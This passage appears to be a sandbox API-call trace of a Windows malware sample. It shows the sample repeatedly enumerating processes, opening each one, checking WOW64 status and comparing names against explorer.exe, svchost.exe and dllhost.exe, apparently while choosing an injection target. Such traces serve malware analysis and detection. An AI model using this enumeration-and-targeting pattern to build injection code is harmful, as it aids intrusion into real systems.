Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0241.804] CloseHandle (hObject=0xec) returned 1 [0241.804] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0241.805] CloseHandle (hObject=0xe8) returned 1 [0241.805] Sleep (dwMilliseconds=0x3e8) [0242.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0242.809] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0242.809] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0242.810] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0242.810] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0242.811] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0242.811] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0242.812] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0242.812] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0242.813] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0242.813] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0242.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0242.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0242.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0242.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0242.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0242.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0242.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0242.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0242.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0242.818] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0242.818] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.818] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.818] CloseHandle (hObject=0xec) returned 1 [0242.818] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0242.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0242.819] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.819] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.819] CloseHandle (hObject=0xec) returned 1 [0242.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0242.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0242.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0242.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0242.821] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.821] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.821] CloseHandle (hObject=0xec) returned 1 [0242.821] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0242.821] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0242.821] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0242.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0242.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0242.821] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.822] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.822] CloseHandle (hObject=0xec) returned 1 [0242.822] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0242.822] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0242.822] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0242.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0242.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0242.822] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.822] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.822] CloseHandle (hObject=0xec) returned 1 [0242.822] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0242.822] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0242.822] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0242.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0242.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0242.823] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.823] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.823] CloseHandle (hObject=0xec) returned 1 [0242.823] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0242.823] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0242.823] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0242.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0242.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0242.824] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.824] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.824] CloseHandle (hObject=0xec) returned 1 [0242.824] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0242.824] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0242.824] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0242.824] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0242.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0242.824] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.824] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.824] CloseHandle (hObject=0xec) returned 1 [0242.825] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0242.825] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0242.825] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0242.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0242.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0242.825] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.825] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.825] CloseHandle (hObject=0xec) returned 1 [0242.825] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0242.825] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0242.825] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0242.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0242.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0242.826] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.826] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.826] CloseHandle (hObject=0xec) returned 1 [0242.826] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0242.826] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0242.826] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0242.826] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0242.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0242.826] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.826] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.827] CloseHandle (hObject=0xec) returned 1 [0242.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0242.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0242.827] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0242.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0242.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0242.827] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.827] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.827] CloseHandle (hObject=0xec) returned 1 [0242.827] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0242.827] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0242.827] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0242.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0242.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0242.828] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.828] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.828] CloseHandle (hObject=0xec) returned 1 [0242.828] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0242.828] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0242.828] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0242.828] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0242.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0242.829] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.829] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.829] CloseHandle (hObject=0xec) returned 1 [0242.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0242.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0242.829] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0242.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0242.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0242.829] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.829] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.829] CloseHandle (hObject=0xec) returned 1 [0242.829] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0242.829] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0242.829] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0242.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0242.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0242.830] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.830] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.830] CloseHandle (hObject=0xec) returned 1 [0242.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0242.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0242.830] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0242.830] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0242.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0242.831] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.831] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.831] CloseHandle (hObject=0xec) returned 1 [0242.831] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0242.831] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0242.831] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0242.831] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0242.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0242.831] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.831] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.831] CloseHandle (hObject=0xec) returned 1 [0242.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0242.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0242.831] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0242.831] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0242.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0242.832] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.832] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.832] CloseHandle (hObject=0xec) returned 1 [0242.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0242.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0242.832] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0242.832] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, 